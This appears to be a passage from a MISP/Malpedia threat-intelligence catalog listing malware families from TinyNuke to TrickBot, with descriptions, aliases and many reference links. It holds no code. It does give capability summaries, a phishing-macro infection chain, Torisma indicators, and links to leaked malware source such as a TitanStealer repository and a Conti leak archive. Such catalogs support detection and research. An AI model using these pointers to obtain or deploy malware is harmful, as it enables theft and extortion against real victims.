TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program’s author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.

The tag is: misp-galaxy:malpedia="TinyNuke"

TinyNuke is also known as:

  • MicroBankingTrojan

  • Nuclear Bot

  • NukeBot

  • Xbot

Table 4774. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke

https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/

https://krebsonsecurity.com/tag/nuclear-bot/

https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet

https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/

https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/

https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html

https://asec.ahnlab.com/en/27346/

https://asec.ahnlab.com/en/32781/

https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702

TinyTurla

Talos describes this as a malware family with very scoped functionality and thus a small code footprint, likely used as a second chance backdoor.

The tag is: misp-galaxy:malpedia="TinyTurla"

TinyTurla is also known as:

Table 4777. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla

https://cybergeeks.tech/a-step-by-step-analysis-of-the-russian-apt-turla-backdoor-called-tinyturla/

https://infosec.exchange/@SophosXOps/111109357153515214

https://blog.talosintelligence.com/2021/09/tinyturla.html

Tiop

The tag is: misp-galaxy:malpedia="Tiop"

Tiop is also known as:

Table 4778. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop

TitanStealer

The stealer is written in Go and capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files.

The tag is: misp-galaxy:malpedia="TitanStealer"

TitanStealer is also known as:

Table 4779. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.titan_stealer

https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219

https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html

https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign

https://github.com/D4NTESCODE/TitanStealerSource

Tofsee

According to PCrisk, Tofsee (also known as Gheg) is a malicious Trojan-type program that is capable of performing DDoS attacks, mining cryptocurrency, sending emails, stealing various account credentials, updating itself, and more.

Cyber criminals mainly use this program as an email-oriented tool (they target users' email accounts), however, having Tofsee installed can also lead to many other problems.

The tag is: misp-galaxy:malpedia="Tofsee"

Tofsee is also known as:

  • Gheg

Table 4781. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee

https://www.cert.pl/en/news/single/tofsee-en/

https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-2-inmemoryconfig-store-vaccine/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/

https://www.govcert.ch/blog/tofsee-spambot-features-.ch-dga-reversal-and-countermesaures/

https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf

https://web.archive.org/web/20090428005953/http://www.marshal8e6.com/trace/i/Gheg,spambot.897.asp

https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-1-binary-file-vaccine/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-3-network-based-kill-switch/

https://blog.talosintelligence.com/tofsee-spam/

https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://gist.github.com/larsborn/0ec24d7b294248c51de0c3335802cbd4

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://intel471.com/blog/privateloader-malware

https://www.virusbulletin.com/virusbulletin/2014/04/tofsee-botnet

https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/

https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining

TONEDEAF

TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.

The tag is: misp-galaxy:malpedia="TONEDEAF"

TONEDEAF is also known as:

Table 4784. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf

https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/

https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

Topinambour

The tag is: misp-galaxy:malpedia="Topinambour"

Topinambour is also known as:

Table 4787. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.topinambour

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

Torisma

Torisma is a complex HTTP(S) downloader, that can serve as an orchestrator handling the execution of additional payloads from the C&C server.

It uses VEST-32 for encryption and decryption of network traffic between the client and the server.

Typically, it uses these parameter names for its HTTP POST requests: ACTION, CODE, CACHE, REQUEST, RES. It sends the victim’s MAC address in the initial request.

The response of the server informing the client about a successful authentication is "Your request has been accepted. ClientID: {f9102bc8a7d81ef01ba}". The client then requests additional data from the server, that decrypts to shellcode and its data parameters, and is executed. The client also creates a named pipe, \\.\pipe\fb4d1181bb09b484d058768598b, that allows inter-process communication with the executed shellcode.

Torisma was usually downloaded by NedDnLoader, and deployed in the Operation DreamJob campaigns starting around Q4 2019.

The tag is: misp-galaxy:malpedia="Torisma"

Torisma is also known as:

Table 4788. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma

http://blog.nsfocus.net/stumbzarus-apt-lazarus/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/

https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf

https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html

https://www.telsy.com/lazarus-gate/

TorLoader

Downloader, delivered via a lure with fake exploits published on Github.

The tag is: misp-galaxy:malpedia="TorLoader"

TorLoader is also known as:

Table 4790. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tor_loader

https://vulncheck.com/blog/fake-repos-deliver-malicious-implant

TOUCHSHIFT

The tag is: misp-galaxy:malpedia="TOUCHSHIFT"

TOUCHSHIFT is also known as:

Table 4792. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.touchshift

https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970

ToxicEye

ToxicEye is a ransomware that spreads through phishing emails. The malware encrypts system files with AES-256 and demands a ransom in Bitcoin.

The tag is: misp-galaxy:malpedia="ToxicEye"

ToxicEye is also known as:

Table 4793. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye

https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/

https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/

TransBox

According to Trend Micro, this is a backdoor abusing the Dropbox API, used by threat actor Earth Yako.

The tag is: misp-galaxy:malpedia="TransBox"

TransBox is also known as:

Table 4794. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.transbox

https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html

TrickBot

A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.

  • Q4 2016 - Detected in wild Oct 2016 - 1st Report 2017 - Trickbot primarily uses Necurs as vehicle for installs. Jan 2018 - Use XMRIG (Monero) miner Feb 2018 - Theft Bitcoin Mar 2018 - Unfinished ransomware module Q3/4 2018 - Trickbot starts being spread through Emotet.

Infection Vector 1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot 2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot 3. Phish > Attached MS Office > Macro enabled > Trickbot installed

The tag is: misp-galaxy:malpedia="TrickBot"

TrickBot is also known as:

  • TheTrick

  • TrickLoader

  • Trickster

Table 4797. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html

https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/

https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module

https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor

https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/

https://twitter.com/anthomsec/status/1321865315513520128

https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms

https://www.wired.co.uk/article/trickbot-malware-group-internal-messages

https://therecord.media/russian-trickbot-malware-developer-pleads-guilty

https://www.youtube.com/watch?v=EyDiIAtdI

https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware

http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html

https://www.netscout.com/blog/asert/dropping-anchor

https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features

https://redcanary.com/resources/webinars/deep-dive-process-injection/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/

https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors

https://www.hhs.gov/sites/default/files/bazarloader.pdf

https://twitter.com/VK_Intel/status/1328578336021483522

https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf

https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/

https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns

https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/

https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/

https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked

https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/

https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/

https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/

https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html

https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf

https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/

https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/

https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/

https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/

https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization

https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf

https://www.youtube.com/watch?v=KMcSAlS9zGE

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573

https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/

https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/

https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/

https://unit42.paloaltonetworks.com/banking-trojan-techniques/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf

https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html

https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/

https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/

https://www.nisos.com/research/trickbot-trickleaks-data-analysis/

https://www.youtube.com/watch?v=lTywPmZEU1A

https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/

https://blog.cyberint.com/ryuk-crypto-ransomware

https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/

https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/

https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html

https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/

https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html

https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/

https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/

https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure

https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/

https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal

https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/

https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles

https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6

https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/

https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/

https://blog.lumen.com/a-look-inside-the-trickbot-botnet/

https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://labs.vipre.com/trickbots-tricks/

https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/

https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/

https://cofenselabs.com/all-you-need-is-text-second-wave/

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption

https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/

https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/

https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/

https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes

https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/

https://www.ic3.gov/Media/News/2022/220120.pdf

https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/

https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf

https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/

https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/

http://www.secureworks.com/research/threat-profiles/gold-blackburn

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf

https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf

https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/

https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/

https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/

https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html

https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships

https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/

https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them

https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/

https://www.youtube.com/watch?v=Brx4cygfmg8

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest

https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

https://www.joesecurity.org/blog/498839998833561473

http://www.malware-traffic-analysis.net/2018/02/01/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/

https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html

https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez

https://www.intrinsec.com/deobfuscating-hunting-ostap/

https://intel471.com/blog/a-brief-history-of-ta505

https://duo.com/decipher/trickbot-up-to-its-old-tricks

https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/

https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/

https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html

https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html

https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/

https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf

https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/

https://arcticwolf.com/resources/blog/karakurt-web

https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity

https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.secureworks.com/research/threat-profiles/gold-swathmore

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware

https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf

https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/

https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/

https://home.treasury.gov/news/press-releases/jy1256

https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/

https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://unit42.paloaltonetworks.com/ryuk-ransomware/

https://www.youtube.com/watch?v=EdchPEHnohw

https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/

https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot

https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/

https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/

https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/

https://www.wired.com/story/trickbot-malware-group-internal-messages/

https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/

https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/

https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737

https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/

https://community.riskiq.com/article/111d6005/description

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html

https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/

https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/

https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html

https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html

https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis

https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html

https://osint.fans/service-nsw-russia-association

https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/

https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89

https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/

https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/

https://intel471.com/blog/conti-leaks-ransomware-development

https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/

https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/

https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607

https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://blog.talosintelligence.com/2020/03/trickbot-primer.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.splunk.com/en_us/blog/security/detecting-trickbots.html

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/

https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html

https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/

https://www.justice.gov/opa/press-release/file/1445241/download

https://community.riskiq.com/article/04ec92f4

https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes

https://www.mandiant.com/media/12596/download

https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/

https://www.secdata.com/the-trickbot-and-mikrotik/

https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/

https://community.riskiq.com/article/298c9fc9

https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html

http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html

https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx

https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/

https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/

https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/

https://www.secureworks.com/research/threat-profiles/gold-blackburn

https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/

https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows

https://share.vx-underground.org/Conti/

https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022

https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/

https://us-cert.cisa.gov/ncas/alerts/aa21-076a

http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.secureworks.com/research/threat-profiles/gold-ulrick

